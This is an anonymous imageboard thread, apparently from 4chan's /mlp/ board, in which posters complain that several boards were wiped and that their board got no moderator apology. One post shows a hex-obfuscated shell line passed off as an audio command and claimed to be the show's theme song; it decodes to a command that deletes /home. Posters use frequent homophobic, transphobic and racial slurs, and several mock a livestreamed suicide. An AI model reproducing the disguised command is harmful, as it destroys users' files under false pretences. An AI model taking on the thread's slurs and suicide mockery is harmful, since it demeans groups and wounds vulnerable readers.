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/mlp/ - Pony

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Why won't they apologize to us properly?
Do you deserve an apology?
Because it happened five fucking minutes ago. Sit your brown ass down and they'll probably but something up within a few hours
Yes I was making a very good bait post, I worked hard on it and it was going to receive many (you)s
The mistake they mean is that they pulled the plug too soon.
Weebs fear horsefuckers
They accidentally the whole thing!?
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No, but the ponies do.
They already had a sticky up on /a/ retard
The USA ban on untrusted platforms is probably scheduled after the Kamala inauguration.
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>They refused to give us an apology
Put your modcode on faggot. You're not paid nothing to fuck up everything.
Honestly I'm not mad about it. The catalog was nothing but bait roleplay prompts, /pol/, offboard drama, and AI-slop threads. Now we'll have a reprieve for at least... a day.
Unexpected board refresh makes for a few hours of chaotic fun, I won't complain as long as it isn't happening too often.
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the apologies will continue until morale improves
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>Faggot thinks Mods will give a shit abot this board
>They fucking nuked it and still didn't care
Anon my bucking generals are gone. I am ANGERY
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>muh generals
>I am rage
then stay mad
So Twimod really is dead, isn't he
Generals are tumors, have been since 2013
He is busy with fixing the server.
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Well shit I knew we were hated but I guess /mlp/ isn't even worth a six word apology
what is this a parody of?
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This actually hurts, sadly.
Some /r9k/fag who blew his brains out on stream iirc
a guy killing himself
If I remember right, it was based off of a kid who was being groomed into being a troon and offed himself on livestream with a shotgun. His mon found him shortly after.
Damn, did Redd cry to both the jannies on Derpi and the ones on here that much?
>His mon found him shortly after.
And the paramedics laughed at this body.
I will stay mad, then I'll remake my generals and won't be mad anymore, you on the other hand, will be a faggot till the day you die
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>/mlp/ isn't even worth a six word apology
They deleted all G5 and EQG threads, so for 5 whole minutes /mlp/ was great again.
They don't need to apologize.
/mlp/ is the Hephaestus of 4chan boards. We're the fucked up, malignant member of the Pantheon, but we still exist as an invaluable member who makes the power of all the other gods (boards) possible.

Take solace and pride in that at least.
Just woke up, what the fuck happened?
Derpy sat on the server.
You don't deserve shit. You're a bunch of parasites.
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Someone posted
>aplay --rawaudio "\$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
then Barneyfag said that this is the MLP theme song in disguise and the mods tried to listen to it.
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nah that was a bot or troll. lee is still in the ukraine after some discord chat group kept spamming him that meme that claimed russians search the most mlp porn until it convinced him to join the fight so he can kill "barneyfags" irl. he still appears to be alive there after nearly a year, though no word from his or his family's social media.
if only you knew how great things will be
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Well, we have twimod, maybe the mods team were expecting that he would make an apology when he wake up
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All the mods collectively spilled drinks on their PCs and caused a great reset.
Still no apology faggot
>some discord chat group kept spamming him that meme that claimed russians search the most mlp porn
But the pic shows that the first three countries are Russia, Ukraine and Belarus.
I guess, he is now trying to get control over the nukes to destroy all three countries at once.
impossible, derpy died almost 5 years ago.
I want a refund.
I watched a couple movies and I guess something happened in the meantime. So what was it exactly? Did the board so offline momentarily or something?
My favorite sewerslvt sample.
Multiple boards were completely wiped including /mlp/
local mod tried to do the equivalent of emptying his recycle bin, accidentally deleted a bunch of folders in the meanwhile
Na, a mod was pulling his butt plug out after fapping to /abdl/ on infinty. And due to the lube on his fingers, he accidentally misclicked and deleted a few catalogues. Happens.
everyone keeps forgetting /diy/ and that's kinda amusing to me
man that is still one of the grimmest pieces of art ive ever seen
it was a really nice shotgun too
fuck I meant to add that
I'm glad /mlp/ is active enough to fill the catalog. Some boards like /3/ will never recover.
If it's b8, it's decent b8.
>The catalog was nothing but bait roleplay prompts, /pol/, offboard drama, and AI-slop threads.
>Mass Produced Pony Plushies
>/merch/ Thread
>Draw Thread
NOoo!! The Snek thread!!!
Should have done their board themselves.
>nuke half the site
>explicitly leave out /mlp/ in the apology tour
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red board is their only route for redemption
What do these board have in common? They seem equally spread among deserted to popular and blue/red. Even one of the secret menu boards got hit.
Yeah! Where the fuck is our apology! I demand a sloppy toppy for this mistake.
Normal threads are worse. You can filter all of them and lose nothing
Did any other board BUT /a/ got an apology?
>What do these board have in common?
Maybe 4chan admins are retarded, have shards without replication and accidentally killed a shard holding all these boards.
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No clue. Mods are being super vague so initially I thought one went rogue.
My schizo take is that they were testing either an algorithm or machine learning "AI" to auto-delete certain threads and it promptly went rogue and tried to purge everything it could access.
>My schizo take is that they were testing either an algorithm or machine learning "AI" to auto-delete certain threads and it promptly went rogue and tried to purge everything it could access.
They forgot to put "not" in the condition and deleted all the threads made by humans.
Too elaborate to be the truth
More likely a typo wiped a server
Wouldn't be the first time this happened
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my schizo take is that /mlp/ is the coconut.jpg of 4chan, and trying to delet it somehow brings down the entire infrastructure and no one knows why
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>all the wiped boards were in fact deleted entirely but they were quickly put back up just in time for everyone to think that they just had every post deleted
/a/, /co/, and /c/, maybe more.
I've been on this site since 2008 and this shit never happened before.
Competency crisis didn't spare even Japan, they probably outsourced DevOps to India.
Mods have nothing to be sorry for, desu. I'd say that OP image counts.
Same. Been here since 2008 and this is the first time I've seen this sort of thing happen. The interesting thing is that the pages weren't forced into an archived state, they were actually deleted wholesale from the website. I wonder what they were trying to do that would cause it.
I wish I could believe this
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Maybe someone posted posted the feds didn't like on a bunch of boards to slow its deletion
*posted something
Trannies rage quit the boards.
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Apart from all the other boards even /3/ received a customized apology but /mlp/ didn't lmoa

the answer should be obvious:
/mlp/ has always been a containment board. they don't actually like it
explains why they just stopped banning the guy who was posting porn over and over earlier today.
But that's based (if the porn was good)
it was a bunch of fluttershy pieces
When seeing the previous PPP thread as "pruned or deleted" I expect it to be just an isolated accidental deletion and not a full on bed shitting spanning many boards. Yikers.
Mods Nuked 4chan Boards - 20
/3/ /a/ /aco/ /an/ /b/ /bant/ /biz/ /c/ /ck/ /cm/ /co/ /d/ /diy/ /fit/ /h/ /int/ /lit/ /mlp/ /trash/ /vip/

/3/ Apology - >>>/3/992846
/a/ Apology - >>>/a/270308316
/c/ Apology - >>>/c/4356890
/cm/ Apology - >>>/cm/3912881
/ck/ Apology - >>>/ck/20782545
/co/ Apology - >>>/co/145128460
/diy/ Apology - >>>/diy/2841949
/lit/ Apology - >>>/lit/23736438
Don't bother anon, anons who say that shit consider all of these to be generals, and the only threads they like are the ones seething about the same 3 things ad infinitum
I saw apology threads for /a/, /c/, /cm/, /co/, /diy/, /lit/, /ck/ and /3/, don't know about the rest
Purple horse is mad anon wants to suck Rarity's marecock instead of hers.
You're talking about someone who had a whole town hall and did nothing but add flags and re-allow anonfilly and writing prompt threads that should not have been un-allowed in the first place, as a result. Ignored every other suggestion and request.You think he actually cares?
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we should go full atlas shrugged on their asses.
The rest of that sticky was a schizo seething about EQG despite making a bot to spam >no hooves until that became autofiltered as spam
fucking /diy/ and /3/ got an apology but not us? im so mad im going to have sex with my horse marefriend
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Why has it been literal years since we've heard from Hiro?
Give us IPs.
It's bad enough my group relies on them to be told apart.
This sounds like something you'd find on Reddit.
>Anon casually admits he goes to reddit
/an/ didn't get an apology. They hate animal fuckers.
He bought the site to make money, not because he gives a shit. Look into why he was ousted from 2chan.
>knows about reddit
>that must me ones goes to reddit
How new are you?
What happened? QRD?
Mods "accidentally" wiped a few boards.
good thing they didnt hit /po/ with the wipe, they wouldnt be able to recover from that.
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Murder Midget would have shot many more instead if let be. Think of it as a mercy kill...
Blowjob though...
This sounds like something you'd find on ponychan
>make a profit
Pick one
You can't kill BJ anyway.
I have seen board wipes before but not a bunch of boards at once. The easiest one to remember was /po/. /s4s/ raided them for a get and it pretty much wiped the board anyway because it was so slow. They are rare but not unheard of. This is different.

The Deleting posts due to an automated thing makes the most sense as there has been more automated moderation development recently than in the last 10 years. The butt poster from /v/ is from what I've heard soley responsible for this needed automation. They also have ban waves caused by barneyfag from time to time due to his botting aswell. In addition to that the actuall companies that spam threads shilling a product or idealogy is way higher than most normal posters would imagine. So bad it's hard to even have thread not by them. /v/ and /gif/ are great examples though I've heard and seen it on other borads before. How much of these are paid to gook moot and what is just contracted to do it is unknown.

>Just alotta generals anyway.
>aside from generals.
I remember when this was a fucking joke. I hate how real it is now with so many generals. No they aren't all generals there are quite a few threads not generals but, if you filters General some times the board would get cut down by more than half.

I'm still happy this board has kept it's own board culture instead of being /reddit/. We even still have OC regularly.
That is fucking based, he really does live by his convictions.
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>aside from generals
Still makes me laugh to this day, sadly I can't find the screencap of that post in my folder anywhere.
>In addition to that the actuall companies that spam threads shilling a product or idealogy is way higher than most normal posters would imagine
By no means should this be surprising to anyone that goes on /pol/ or even /tv/ for more than a few minutes. The obvious shill posts are so overt it is scary. They don't even care anymore.
Rolled 19 (1d20)

Watch me try
For the sake of my balls...
...please work...
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Rolled 16 (1d20)

Oh hey, look at that, you just needed to ask nicely.
Why are we always involved when some 4chan wide fuckery is going on?
jewening, tripcode hacks, jannies going haywire, now this
>anyone that goes on /pol/ ... for more than a few minutes
Who would willingly subject themselves to this?
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>>aside from generals.
Another reminder of my enternal newfaggotry. Thanks Anons
kek eviscerated
>>make a profit
>Pick one
They don't get money from regular ads.
They get money from the companies so that their hired shills are not banned.
See /g/ and the neverending Apple/Thinkpad/etc spam.

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